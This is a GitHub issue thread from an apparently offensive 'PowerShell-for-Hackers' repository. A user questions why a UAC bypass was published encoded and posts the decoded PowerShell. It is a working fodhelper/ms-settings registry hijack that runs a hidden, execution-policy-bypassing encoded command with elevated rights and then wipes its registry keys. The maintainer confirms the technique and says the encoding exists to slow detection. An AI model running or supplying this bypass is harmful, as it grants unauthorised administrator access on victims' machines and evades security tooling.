### ISSUE TITLE
encription

### ISSUE THREAD

**Issue by unknown81311** [I-Am-Jakoby/PowerShell-for-Hackers#4]
for the UAC bypass why is everything encrypted?
why not just show the code? kind of sus.

```
$OMG="powershell.exe -w h -NoP -NonI -Exec Bypass -enc $code ";
reg add "HKCU\Software\Classes\.omg\Shell\Open\command" /d $OMG /f;
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".omg" /f;
fodhelper.exe;
Start-Sleep -s 3;
reg delete "HKCU\Software\Classes\.omg\" /f;
reg delete "HKCU\Software\Classes\ms-settings\" /f;
```

**Comment by I-Am-Jakoby** [comment]
Encryption* 
Lol 

Just so everyone didn't use the plain text and burn it as fast. It will eventually I know but slowing it even a little is beneficial to me. 

And you've decoded it and see it does exactly what it's supposed to. Simply a modification of the fodhelper bypass
